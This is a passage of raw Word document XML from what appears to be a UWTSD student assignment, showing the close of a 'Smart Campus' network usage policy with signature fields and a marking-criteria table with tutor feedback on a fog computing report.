    <w:p w14:paraId="65A501B9" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>All user activity within the network is logged and any user caught breaching the network policy will incur an automatic removal of network privileges and will be subject to disciplinary procedures which could lead to employment termination and/or prosecution by the police in conjunction with the computer misuse act of 1990 and the data protection act of 1998 under UK law.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06400687" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6147273B" w14:textId="7134BC9A" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">By signing this document, I understand and agree to all the policies and procedures laid out in </w:t>
      </w:r>
      <w:r w:rsidR="007702EF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00895462">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="007702EF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UWTSD Smart Campus’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>network policy and the consequences that breaking any of these policies may incur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8F980" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304848AA" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Signatures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60187F32" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pc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1842"/>
        <w:gridCol w:w="960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00555D25" w:rsidRPr="00555D25" w14:paraId="2FD78F71" w14:textId="77777777" w:rsidTr="002907EF">
        <w:trPr>
          <w:trHeight w:val="267"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2219" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26D47F0D" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Witness:</w:t>
            </w:r>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:i/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>(Print name</w:t>
            </w:r>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411AE00D" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1828" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3F1233C1" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Signed</w:t>
            </w:r>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="953" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38585592" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00555D25" w:rsidRPr="00555D25" w14:paraId="0E5587BB" w14:textId="77777777" w:rsidTr="002907EF">
        <w:trPr>
          <w:trHeight w:val="472"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2219" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BA6ADE0" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Staff/Guest:</w:t>
            </w:r>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:i/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>(Print name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446963AF" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1828" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A220D6A" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Signed:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="953" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="27695102" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00555D25">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="696DD924" w14:textId="77777777" w:rsidR="002010EA" w:rsidRDefault="002010EA" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="002010EA" w:rsidSect="0081670D">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1276" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="360"/>
          <w:rtlGutter/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE5FF9E" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>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2010EA" w:rsidRPr="002010EA" w14:paraId="063A00F2" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10670" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="088C3781" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:caps/>
                <w:sz w:val="40"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">                 marking criteria and Student FEEDBACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A42F66A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F42AAE" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002010EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details the assessment criteria. The </w:t>
      </w:r>
      <w:r w:rsidRPr="002010EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t>extent</w:t>
      </w:r>
      <w:r w:rsidRPr="002010EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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3163DE3" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9274"/>
        <w:gridCol w:w="592"/>
        <w:gridCol w:w="590"/>
      </w:tblGrid>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="410486C1" w14:textId="77777777" w:rsidTr="00167CC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750FDDC" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Common Assessment Criteria </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Applied </w:t>
            </w:r>
            <w:bookmarkStart w:id="2" w:name="assessmentComponent"/>
            <w:bookmarkEnd w:id="2"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>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927DD4D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:left="34" w:right="113"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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961C0E5" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Marks </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0631D6A7" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>awarded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="0AC55205" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="65B27BE5" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Research-informed Literature</w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B47DB9C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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EC093DC" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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CF554DD" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="6766B772" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4EE831FA" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="feedbackRIL"/>
            <w:bookmarkEnd w:id="3"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Outstanding knowledge of research informed literature.  Diversity of sources used with high level of referencing skills consistently applied. Some relevant key areas discussed on Fog computing which a new networking area that extends cloud computing. You need to discuss key concept and treat as an assignment, this is not a project.  You have went way overboard with your research. You can include additional research content into appendix. (Grade mark: 97.78%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CD22B72" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="totalRIL"/>
            <w:bookmarkEnd w:id="4"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang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65D99645" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="markRIL"/>
            <w:bookmarkEnd w:id="5"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="60285A51" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A987D35" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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77085090" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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5079D40" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="05C10FF8" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="071DCCDE" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Knowledge and Understanding of Subject</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D49024B" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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4E9C014" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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67A8805" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="3591F055" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A8E6300" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="feedbackKUS"/>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
